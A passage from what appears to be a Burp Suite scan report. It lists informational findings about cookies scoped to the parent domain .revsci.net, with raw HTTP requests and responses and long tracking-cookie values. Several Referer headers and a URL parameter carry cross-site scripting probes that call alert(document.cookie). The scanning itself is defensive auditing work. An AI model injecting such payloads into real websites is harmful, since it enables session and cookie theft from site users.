GET /H05525/b3/0/3/360/1/0/12DBAF7B7D9/0/0/00000000/722681440.gif?D=DM_LOC%3Dhttp%3A%2F%2Fwww.autocheck.com%2F%253FWT.mc_id%253D1824%2526siteID%253D182471a71%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%2Fscript%25253E6dab831a574%2526type%253D%2526make%253D%2526model%253D%2526sid%253DExperian%2526Year%253D%2526section%253D%2526content%253D%26DM_REF%3Dhttp%3A%2F%2Fburp%2Fshow%2F54%26DM_EOM%3D1 HTTP/1.1
Host: pix01.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBE4gHgVlDEdBGccKRt+NPtq9Q2XTJceL+0HupXmjnWmzuhIGM6lfPp5ixKDcMr+Ii79Fc2vPW5duJgxxcN/oeczKDujEEoSBEvNoIhhASZpi002JL7KxepMxQs8stwxfU/GVEKQUZuR2gwNzE3rczaCMMDHXqzRgNXmXGXpQ29HMiCR3LFNRLO+zyc+soAgVeC3wFxfFz0TNfRqLbav7YZmm5PUmTeRjv+yY6eXNNBmRhlghJSw==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPFfEOlLgIYlVNWKZU1sWJH1I8V0sD586OtYWpJIZ5At588pHu0XtJj0vEjmwH5W+0fVgtXKwemg4X+X+ZcSFKrAeiVdwmYRcxYnZGANiwodqN5uhpI2RG7gf2tidEme72Dc6LcL4puWziUNiMSVj9Rlec2UMv/RY8CSw1fUUBq299ft5vcz4/QVANk+xUmIlgaIoFCnYcBk/VuIcXautuNt5oFCJuLKVA=; udm_0=MLvv8iEJPj5n5t4Lxl8gqM+1+kVoa5JUtjw8RivzoP+6DdtaaJZxHI3717ZFmK2ZlsyUeOuq1XEViaeooyTfZUM3DFRjLhZPKW5XYmxNuO+4+rYyDseF5YobgFQCn2cS7aRvMTMvoplsJb6dvG7t3PCR6Rou8l75exTjbBjgseL+XAqHsouMbHMryYHF1wxXZE50wIytk8Q3eKmmpA0exyO99w7z20ofCv9JlxWMNHyralUwaaBqnHaNcF8NLXsy9AB+zs+UcyCKXdEjj3O1C6WOtNb3pH3/jow9FynWUeWw7QSn0aSkoenRcQhxCe63j6D1DByzYPmvyTIGtMnbOmjDploVPBPbrLNCKcbesh+PrRvMnSVXdy05AL22vNX0q4JCOba0b9bOGV8NtCTL9L3/TUIPkLc+apBjqNighdFBh36gkaxuC1c/An57s+87tT5f8png7zjrKl9PcTk3l4Y5RLgIy3GmWmLXFI93zstHlqsJgWd5QlwPCdT76camu9cemH/XJhelupJXy/sB5OGGoHHObI87INpeX0bS1gX3MOhN2NKt5hwZF/B8uoP85q7F0xxRf3ipYj4GZGV7k1/y4mq698jVyTdCsDE0i9Y7Q66bh3+Z4MfhR6lSoSmVAKVIUiWWW4G3/wTqrejoUQCYoQKd4VwE/i4ToD9z5SSr4tny7VPLcN0fTcmjjYo377nxMIFMKDCkOo0XGMGHpNIudWENyCdQ0DrCiXIGV9nuUw8Q3qmUsYwDn/aRc4ciHT0ANjzZVwN53mjStBIjn/S2XdwK13xeoP8pXNfmKCYFrf8pU+0/Yn7gtaIl0ujBFU2ORgQQ2P/Jaf/WlLPAqyPBvwp/X9958EnXYBM2+sm/tx7X2Czc168Jw9LTEmh/A3Gw0ZpetH5orwSKrfqcnwOV1sbSoQxyd1GbYRlqFXI=; rsi_us_1000000=pUMd5E+jOAQU7cSkfv4IPX6eN3YupMgZuJrysr+11fWxVfkSpo0os1NAOiV7o4tu+/m94QEhZP0cXHl+jltOoG8kdZMnfyxlxePpC8HjcSIzweBxL1RaZuXGxOcyb5DPQUA0BNBxiAzJTnhtaoovtsej7KfbOzVqwWQAwu7pzeuJhMTpgYxQRIFodt609Kmvmi2voHMjDyFGDAqmh5BUBJptcRLuM3k8wyDEsdR/JQyXnpG2EyjMCdDhtxN1n9dfozURJG0GnWUJc5NA+/6WswcH9TEm2KF6lrp/i83TnEha22I6hWy0Mw6iH9nKJUHAcAfi1n4sxzN+Pn9/0I6Gab3MqiEskA2X5tJjHle5QxPNxrbdR5NxhevdEnWJMXTtgi3Wk4Vyr3JczLTywQ8uIu54kw/PS5a+wHiP0EsLne0HG01orKurPeZuidEJHhW75HbZAz22cuz2r1qI9Wehlyio6Qe9nCbVIJBPqoE8QUfCmCr2oj/cmdY9+2DKExi05VBzMutgzcVv8HNLlMERiEATkQqa9g7LXFFcXWMSoYyxfVWbcDgT8wm3j6l2TNr+GIAICRcg0nlAPQJuT7ZS6Ud6Hvor2dTZmWdTeQ2rPlZ1uOjGmikwDw2GrCuh5m/iT/l+E9wG5IRy/ydqh2a+9q3aejykJqymBN3BZLPuGhyTP4PdVSKYR0ITgGAvzWqIFl0LhrVjtCokLQizF1ZTiim4fIn6AiSa18OoqxGaUE/gTsbe45JpJKYly9hnej6gFG9Fq48mQGoXqgy+UyJtehg4yPWLjyUavRi/ZGAot5+iNQeoldbJUCFlbi8H3At4n1S9s4u0e6pTI95ZorowqQUo+fSV3g2N9p5zeOwI+cmdoEsnV/XTzldmltapU6Rg8c2baKjX6LcjSFhyX7bP76iTEQSlpNsccyN5AYX+AhEu6NRB3v3neOIiKC7cJP1qyTPU8bf6+hakxdkBqBCD

Response

13.134. http://pix04.revsci.net/D08734/a1/0/3/0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFe0PF7gMQVVNGyQq+TU2VE+8mA39mBOeRh8RvTJt273WYJS9QISCAgxkL8VjFACM37MfrDDLUs0/J7x6i1dFRPx6pUlOXaI5/n7KF+o95GFlfu6bAQxdbksk/G6ZetLtVuUHObHxtaAhT6IXAr41re6IGCI3YkT7Ot5GHMsd00VnbeSE3LED2fRDf76H+UXNnAo6GqQf642LViN27Nm5ci4P2QCs/mQ==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
udm_0=MLvv8iMJPj5n556BI9UE1kizmpAJIKPS2xvIWgYgIL9uKluQ8FTWspXP9z4dgc5Tjg+GkX/DBLD8Zrk6ODbszw9SQsj7PZKWy9ABFwmjwFQ0evvUib/yLZvfFBwXjwkM6rO5fK3YxCq96Or8oFRjVVbCdBPtCXzjQQ606TVULA37mJHG25W+jkE7p1jQOeoDDwy2jaZ6Omq9TgPkKnz/2sB0xjf6hRk5jspTBxqt3Samayo0BEhuwOAtLyHa2SAHSFNkdscUfCABv5wWZ69lNy/8E1fEy1c0DItf5p8OFukjcdIonhq1eRb6B48/AILBIc00QM0t7lo3mxTkSaRCHTLwWpI/++sA4FlsayoEUarNExUU14xOuUzXwFMaOQsoKguT4Mqv46Zp+p9aQ4hBJ4x7XfHf1Yit+yw4YwheL7sEc5PCCZWuYBwsPCjjdwfifwIkriRKqwo0hzzpuv/m8IR1NyhxKkuk5UPrz/0VvxhBuaVzKJhwMfvue26gSUOMHdBWtA/j4mN8kgEP9MoS1UlCXJAYq2xvKQHpINvr5HGv5ED0JzYAHaKinjgVdRdZEFJayVgS5+Vn0gT5QbIyKvOAct9TPFNBfNF4KZv6Cd+4q1QE+wyal0pIenFyY1LiESIecDIzguUCGeMMlqS8UOgDOJ0GlaX4I4i0BWA6cWEsvE3p6qa90UVX6zf0f62pK8/yb9lJ2URHr/fWfNNqpVKdEeL/IT/Vw/pEdLjNz3BRFPSMC5AcC6moMFLV9fmvTLWnyTgGS+vrC91TuEpKa5Q5B4/35ZET8T1LQZ4kfDraCwCPKoMcDRlIYdTjJrUN+eQXmdK9qokSlrPjDATn81V5QAgfh7AY63Dn1yl75bX4LJLOke9K9tsmFvJLkDnM6XVaYNZJWpEJJiINpz7cuAE6deDoOnuaZrAt4Hq4ACj0; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d80gUDW6ZteHnhbnxoW32lNFY0RqP3YO00gC9MvXLUz2hBYjVv/fgqyTx1ReFJEGLEnkzsXGVm9+/kBk41UxopUKSTrKRzkQ5YXg==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fna.com%253Fnada%253D%2526naid%253D%2526namp%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; udm_0=MLvv8iEJPj5n5t4Ltt9EX/C7xZnl5hjzDNVGFWEzjcOGPSjwQeqblsz4NQqc0gDPHJGwQqP04Gl/fjd0NwxKE04RBfv6QDvz32B6fwU5Fu34L666BG4fi9tTCQB7HzLjsLqPpe/ZNv6p6Wv6E4ZBUtNIPMZXaK38wui6tKY7SLyOhMMPSJKHQjAq7iVOFpHQSiIVffpJbnNSOVw3KAaxc6ZIuNW0TwoNno2N7hLN8h5r0ETnNH1Wumo6MsJMHy6rUG0M0AVwc0C8t2sgjHPROMA7VMvEXCMRiwynjB1TRk/+PVfpEc1tHyJeAqnj0jneawiO5aIsZWU/7yPlu5ciMTLE8+z5XpS+HdjIJZiKw1Jd4rWuHlcWhdMmo0w4BgvLrRDX5hKPVKrZaofBbsFrLK+YUHM4qv2l8zWxk2A0eFUUwPQGjp4RSLamucNFvJcwuLIA/C4N0vTadc1XEiqHWN9m59nxOVRc25CL28bCg9D7XIK8eQGl39rH79pq83w2Y7yTdp2vq/JQyywuUIosSaihXjhZsv5zVjsGq0ous0noNBGVBibouZ6BUldR6RYnFDGvwwEsGVJSDLRRNx/p1i5vF0c5w+tOkuGmoQgKCEah+BLI3eY4IHERUjQHegjRiYhL18Bf95kytJzUyG1CQvSeHJOczvbE8rlrMExy1YkvWXbw0EkxMvneLlRouFMzUVJFJTrqMPWcsk2yKZjYh/ijo2o/CmAOTbQ5kX5IdSZG+Myf0KmUsYyDn3ob6Bqd0BC6gho3A+TkpwR3LAXJV+jj4sbj58smKFZBQAZVL97B2AHIadTbzX24S5gt3hJk6ySr2S1M1lWOdAtajdXelKAOgeKm2wNtK/Wy58LDt1SOkNjbuNw5upFoMJrUEnAHA3Gw0Zpesn5sqwSKrfo8m1ARoDsiZ17yITyYdiQgFv4=; rsi_us_1000000=pUMd5U+DfxIU7WxyqNQb+zH1s17HozKcX9zb1nGBmx1V/jUVnfeldtQjURXj62Ij5rwYZ9wJ1NqZFDtPnA/ai2kzB4ZWck4RlBED9tHPfALbjG5/h+EbQvknzyyRcrItMoJol6PXNTl/OKv1HLyRjqxPdUMPuhTeFrZcyO8gAu7DnkKRicwv26rJbnB2YkIMVwnyQe25v0bF8cRbuIDVa248qh0eMMOfyR/FXEsxPsbCZDweM7dbepZIWR3dtd+dVimkWAYQoZALNR+V/guGHuxfyVd2gEOLAGwOQllMhFXpg30hoPoVfJhXFUqiQNm3BzjM0qe3oej3+PsACj2CU61hVKeF2HNY9k2ol1ixdYUyhZXc+csbq2QEngScG8Fyk28f3CtFfcgafRot2T5UJdsjwU///O8q5QLpNWARM1w/lHLi6xhWyV7RPg2RTuUehxIA5X1CDzhakTy4gchBqLYpsImsUgwLdediq5xOCZUg5jzSYFUo7zRvJUElYuphp8OzQ1AQryrdIBXfr2Q7k0pOTQtw0Sya6irERSdIDFN9xHQEpu/KZi/VfFED67ADmmemfMMNlbnugnmTr6LTfKuLWuw4QB8ULOl4ICmXLj6pBD/5tNcSMJWTFHOixo4IK0vkutnkoKUs/dGDMVzfYfICMrfqYm5ooaMqvnmJ2DAzQJTYRF4vDA6NPTQcbJifGlogyZA5q8lXRY25R+s5rcSx1LACJzBJtIrHnrtl8SXouSQzf3kTOxNhVDItJBmmUFdwuBsLv9W3DOHJYpGPu7/HeVRht67vcq4vWMq3VbvT2WCZWCAVmSFQIlAkZlXJXT993g==; rsi_segs_1000000=pUPFfcnGLgIUllNabySXY2IY55gHIZ1QyKSeDed+9JzIG0W8+AvdYSYAvxOUI2VbrccphmHkGcSot3nYvefOg9C/MS0+qcd1BcnTcNaYEkF0xialv9bj0hdb5U5jkD/4MjdaHkbSa+M/fe/FnBrMkcx0mUp01NJdnnpXlDRY2lXJS+GRf809xmH4pSnkubT29s7GCNDtfCsSqFFM2AiI79rbsE4FMdY=; rtc_0=MLuBE4gHgVlDEdBGccKRt+NPtq9Q2XTJceL+0HupXmjnWmzuhIGM6lfPp5ixKDcMr+Ii79Fc2vPW5duJgxxcN/oeczKDujEEoSBEvNoIhhASZpi002JL7KxepMxQs8stwxfU/GVEKQUZuR2gwNzE3rczaCMMDHXqzRgNXmXGXpQ29HMiCR3LFNRLO+zyc+soAgVeC3wFxfFz0TNfRqLbav7YZmm5PUmTeRjv+yY6eXNNBmRhlghJSw==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFe0PF7gMQVVNGyQq+TU2VE+8mA39mBOeRh8RvTJt273WYJS9QISCAgxkL8VjFACM37MfrDDLUs0/J7x6i1dFRPx6pUlOXaI5/n7KF+o95GFlfu6bAQxdbksk/G6ZetLtVuUHObHxtaAhT6IXAr41re6IGCI3YkT7Ot5GHMsd00VnbeSE3LED2fRDf76H+UXNnAo6GqQf642LViN27Nm5ci4P2QCs/mQ==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvv8iMJPj5n556BI9UE1kizmpAJIKPS2xvIWgYgIL9uKluQ8FTWspXP9z4dgc5Tjg+GkX/DBLD8Zrk6ODbszw9SQsj7PZKWy9ABFwmjwFQ0evvUib/yLZvfFBwXjwkM6rO5fK3YxCq96Or8oFRjVVbCdBPtCXzjQQ606TVULA37mJHG25W+jkE7p1jQOeoDDwy2jaZ6Omq9TgPkKnz/2sB0xjf6hRk5jspTBxqt3Samayo0BEhuwOAtLyHa2SAHSFNkdscUfCABv5wWZ69lNy/8E1fEy1c0DItf5p8OFukjcdIonhq1eRb6B48/AILBIc00QM0t7lo3mxTkSaRCHTLwWpI/++sA4FlsayoEUarNExUU14xOuUzXwFMaOQsoKguT4Mqv46Zp+p9aQ4hBJ4x7XfHf1Yit+yw4YwheL7sEc5PCCZWuYBwsPCjjdwfifwIkriRKqwo0hzzpuv/m8IR1NyhxKkuk5UPrz/0VvxhBuaVzKJhwMfvue26gSUOMHdBWtA/j4mN8kgEP9MoS1UlCXJAYq2xvKQHpINvr5HGv5ED0JzYAHaKinjgVdRdZEFJayVgS5+Vn0gT5QbIyKvOAct9TPFNBfNF4KZv6Cd+4q1QE+wyal0pIenFyY1LiESIecDIzguUCGeMMlqS8UOgDOJ0GlaX4I4i0BWA6cWEsvE3p6qa90UVX6zf0f62pK8/yb9lJ2URHr/fWfNNqpVKdEeL/IT/Vw/pEdLjNz3BRFPSMC5AcC6moMFLV9fmvTLWnyTgGS+vrC91TuEpKa5Q5B4/35ZET8T1LQZ4kfDraCwCPKoMcDRlIYdTjJrUN+eQXmdK9qokSlrPjDATn81V5QAgfh7AY63Dn1yl75bX4LJLOke9K9tsmFvJLkDnM6XVaYNZJWpEJJiINpz7cuAE6deDoOnuaZrAt4Hq4ACj0; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
Set-Cookie: rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d80gUDW6ZteHnhbnxoW32lNFY0RqP3YO00gC9MvXLUz2hBYjVv/fgqyTx1ReFJEGLEnkzsXGVm9+/kBk41UxopUKSTrKRzkQ5YXg==; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:06:32 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 297
Date: Tue, 25 Jan 2011 03:06:32 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs = ['D08734_72132','D08734_72122','D08734_72123','D08734_72125','D08734_72126','D08734_71432'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['D087
...[SNIP]...

13.135. http://pix04.revsci.net/D08734/a3/0/3/0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a3/0/3/0.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFeUOFbwIUllNab/cWT+71VQYFMB/S2WSRefHo4ZtopQOMM7v8PGteSudqC0pSV+0cVuXVIOwjJcWBtxQyhYXg266RvwGvtnnTlHdbuLEMszLgQEzYHnes8sv2VzE+J1DTe38IF3SOzHYQtLFR3ESF9iR7HCfJEVevflUUS/6dE/Mx/WJ1Xoojkg7wrwpMTBOQMei1AXvWMs0VC0dh24L4xtZiUwaGNkAfYEVXeFUytqh2B9e8pzfdb8ndYojjgotwwQs=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:40 GMT; Path=/
udm_0=MLv39VEJKTpn5l6pUNmEWEzMKG45IuEqmBBIfYaUcjeAzuFye+b+KeIZ8tkF3tzTHZ2QnYDrsm8yZEEzQFSlsKuzpFsHJLRmUyNDZGs8wuB7MAYu0WhRql1pFlfdsk0PXv+O8oosstifQ51JPmgHotLWbzVAPUbgeOrkkO3PFrbz4SeQbTrMV1NVyr5r6M8chD02fm3i43pRp1PeI1joJCvmEjHJvn0VFB7vMlWKUsKCVQEP1ZSDsp6oUx57p/nHilXryR9sIPzTsNBUe9eDiBNIYeW+9mECa7M0AjD/Vcz/FnfBt1uOQs2nd+VgcUjnEtuUTfLTvObBcum6WRUbq3oSTGslWvh8JnPTpcb7HQLFtVHEGxjlbI6E8H7KOXctvSU8aAzGUT8RGP0NkftE0oKUTX6Ui5Qk6Hl1aF0840g0DVtmiCpVXnw2+x2wuxwFCh8P1D1qjY2mQfBrSO3ePpH3parBpg8oM4qmDnEEwDanIYsSZegYX4VDOt3SFH1yL8FJSyY3HD6e6GKgaaK9iKgSKCkH5jDhRvXVY+j6iw6+dfp7omioseS6Z03w+GlD0SA+kV5vdt6YJLDpwF04J8zTGDjcVAfhAPgg9zQcY17KDpvKauirxygcT/lZl9NRozklUQk1WvkAfMTZ8eAeU8Y5MHekFBLTY7fsiJiEjya/c9hNv6Jn225zZhDtOWzpvf7pLFR1F3ddCJj+ZLMLCNt2qoiAPtqk3Z2R4TwWOePPMO7t9IW6e5UImrhwl4PObVEr2IHVrmPaPoySb80MJACtSku+nyikHCrJuoa0Onh466k3SaP5pgJj5AN3qQ//qWmAHi6+34jfmmzdq18AmlqUa6Niv6278fTccmM8uni84fSQiSYcLeNq8Us8kQaFNbnoDorAmwCoYryNvncBB/EG++N9eqSyJOLrV+tsIkRyCeSM1oQQXbgCZjLrspisqylDj5c5Rxno4Y2x+Sa2S09kKAD7ph+eqIEKz5wnNvi0WnewN3qmc450pXtZA8Sl439MXUt2iLvyn8j7kYB/8cMNbJQ8xWI=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:40 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a3/0/3/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Frl.com%253F&_rlcdnsegs= HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; udm_0=MLv39VEJKSpv594MC+h4JSwIkXqgYHMmyC3xYCeyCGUJt6bsIndhJEjJwdqucoUZrgWCmxyU0OJlQ213w21JPmM/iDJlITl3EEFzngB2QtFc0Xl9U/Gg3PagTLMo3o+hwr2WlZ6YG0ReovbWWOGbKwkxB8k2WUjgEE0/nS2wlrbz4SeYx6w7iQUYu+7iRB+ZkIwg3nRrpGl6f6V7A4+jE5lFU02hSv4Dc+7C4SbhWK2btovuT99PG9kRbKR4uGz7mngMO6lV1V2qeLLybr2pkltIYWzeU2CSZ/Np7jsMFstEqzggt8q7xijoefvXgj34E9tszfFjcONJpkNdSmuiKcvP8yZR6GDqwvcFczCslxYpArJcTEEljhOdn26rcepxbj3ztDcefDmtvZC9ynKoJ7G3tS4SmoGqviDkSGvnK9Wvul+D++lbyAc8ttiE15n9rrgo78Mlpfx6tV0UNRfYJx1T04JOxz+3KHxRdVLD8RIxGVWf+HQnGh0fSiH7t6IFohD1y5mC7utj0tZGphNePvNPCkAjhcShrI/rZNIAjbsW9AhiWohf2Bdagg0zrh3s8tnuAI2cA9oxwOF5+jbDUCM4eu/YexI+LP/69jTg7lPKDpsKYeiqxSgMT/1ZnycNKeT7AQl1YSuwAt/18KYCUyiFOwSxOEUPMeDv+ro5+s2YrN4YRm5XcW9t5RwAbBmY6ISFsQkwBVC1w2zqeokHqrWKPsmTioHVbv2dXyUcemAdKyD0eXur5j86czqg3xmGkah4P5wGCIjwWRgY0/iMMz3fX0cOMe62Zy5ySYpf+OUu2RSTsCilKmxQPIb037DRqxhI/nM3/kMiU0g8BQIHKlIGr4wJuNxD8kqznxGYFcZQyQr9M4DmGg6oQQOnfKJ0mSpKzCKbvJrtg5JqjdTKM1cwjOiKnXjZ4O/Uo0Lx5CLnF4QrNqrMyL8fhJ6biE1yQSM38Rl2E3lt6yE8erh9T0D0mTvA/DUbSTGfmaC295aKSZtombrxSg==; rsi_segs_1000000=pUPFeUOFKAIQllNebxYSX/7FVZO+2HE/NwaPC9kIrJHqOnrEc33JSNbVKrLOTSTz8u45YqJ5KjZ6Ij0BAc6LaEU6q5lA7TEaFMC1e7ycuvgoFxOngNXurs7m7MtN3jo8p42IMuk7kcm6MCzJEGPCp71tWbHI5aA4g0jbQb75Neado23EkvPsCIcguA8wrnZczBOQsee1AWvWMs2VlHhkdiZnG+iuUC1bVKOu30eI9ko96Ouw5jqt61pBUbFt5z8a3IuYwQg=; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvrtUvMS5jJgE8Bfe6cKgGOGAsfptdU57ZFCcHw0VHCzA/o0KkSj0PJCRcrDNiI2pUwHkhNNw5oHlX5MmxeO+mIZyYmyCbY6iQafPZ6+LBgiJ31XZSAmdu7XM3v6XPsGsEIVVFoxJ5fkPoROu1KPrwL3mJvkpUxR2ahzW1GdqKdHPfuIeZOuAlPcpWPYvZKH0TOyC3pIT4byenxVul43ki/yr3t4sXECsCO/l7LUPIzu5inLb2AHWNd3RawaJr4nvr29ghnIZeDHnJgYmD+N289aOkqgT9XozfsKYn1Ad6yoEzxeC3SSHRXzjW5SA6Z5NQV0c1JA==; rsi_us_1000000=pUMdJD2nyBcc1A0Q8ow0pM8gvg74F8hOVRxIycUhWjXI8gGTTZkZzXl4PCwq7QqVt1jxpAPDzqONXq/SDIt6Z/n+buGa6m/oqaICNlsCp1Mmx9NM7pL6Y27DJE9vzDLZWgw4J9LBtxRtpXy9fQP1qz/YFy5djLvmQ1axeGnbixda0WlTs1fvVPJ4j9XBlxKDqMEk/ZdmARBJgJnVnp0SEvPrpB9XnOJVKWRSN57hd4oeqp13L3yu0muCEBrPe2+LJrmMkqCh7HCN28EcXnaWNYcHQbaU66Jc5rq/5idcbd5kSa2CoFTd0cp6AefiizaxjQhyZK49hI1/MRY3Rj3MGP1IHp0il8hNIHzM4xckWgGbYaOpNbd4OPX/3vaPG1jYgA8SApt7aAdtgNmJASAitd+XQitPSH6vsr8P5mDu117hc4MbcebGUJ9m1wooAKc4hMFuIV1hyVJo7TFU2VLRwKBWtN42XQUiPXXAtLavYVcwiX+aH3135smhdT7xRtFKyQAuLhytEizSz0g59GLmqkgRB/oHOrM0otWp2HIHmTCadUkGeWmHP6iODtxbFdST0uJE1SxuwcudHmV9ol3vLWk5sSreso+DkDKD/zun4aK60os8ZyTljfxQ7Z25bppWh8cAwZCwT1kFe7rTQpzup0orsQseD8dmf+D+brQ7hVQtd+0bYQJRtvd9edhyN21hJYfsYL2/o9aCVPeIiTKwP3IxuVtNh0W+gRVIw9WFNJzP+vNK0qK4X7HJewXCt+eKAOlAhMrm2C7mVwF5nAWa6AAYz2WOUhoN0C+sJoYIEyOoVrXbsoWHDWwYiJCR9UEqZPsviYYNEHXPQ+9UMWfUlRLU50X1zZH3utPaZx1OvfKpnB8kD5obOu4VlLkhpoI/dxDBcZFVNKKe63NjRH3hO9B3fwSms/ZAODtoku7MUAr4VhBEZ4/zFgGwgoE4iqs5r8Djyf1i4AbO+bM56Jv9rrQFJlY4v45CaBomTbH6Hb6dvs00HpMsGi/CKwymodfxaboEtFuMlPxjvA8=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeUOFbwIUllNab/cWT+71VQYFMB/S2WSRefHo4ZtopQOMM7v8PGteSudqC0pSV+0cVuXVIOwjJcWBtxQyhYXg266RvwGvtnnTlHdbuLEMszLgQEzYHnes8sv2VzE+J1DTe38IF3SOzHYQtLFR3ESF9iR7HCfJEVevflUUS/6dE/Mx/WJ1Xoojkg7wrwpMTBOQMei1AXvWMs0VC0dh24L4xtZiUwaGNkAfYEVXeFUytqh2B9e8pzfdb8ndYojjgotwwQs=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:23:40 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
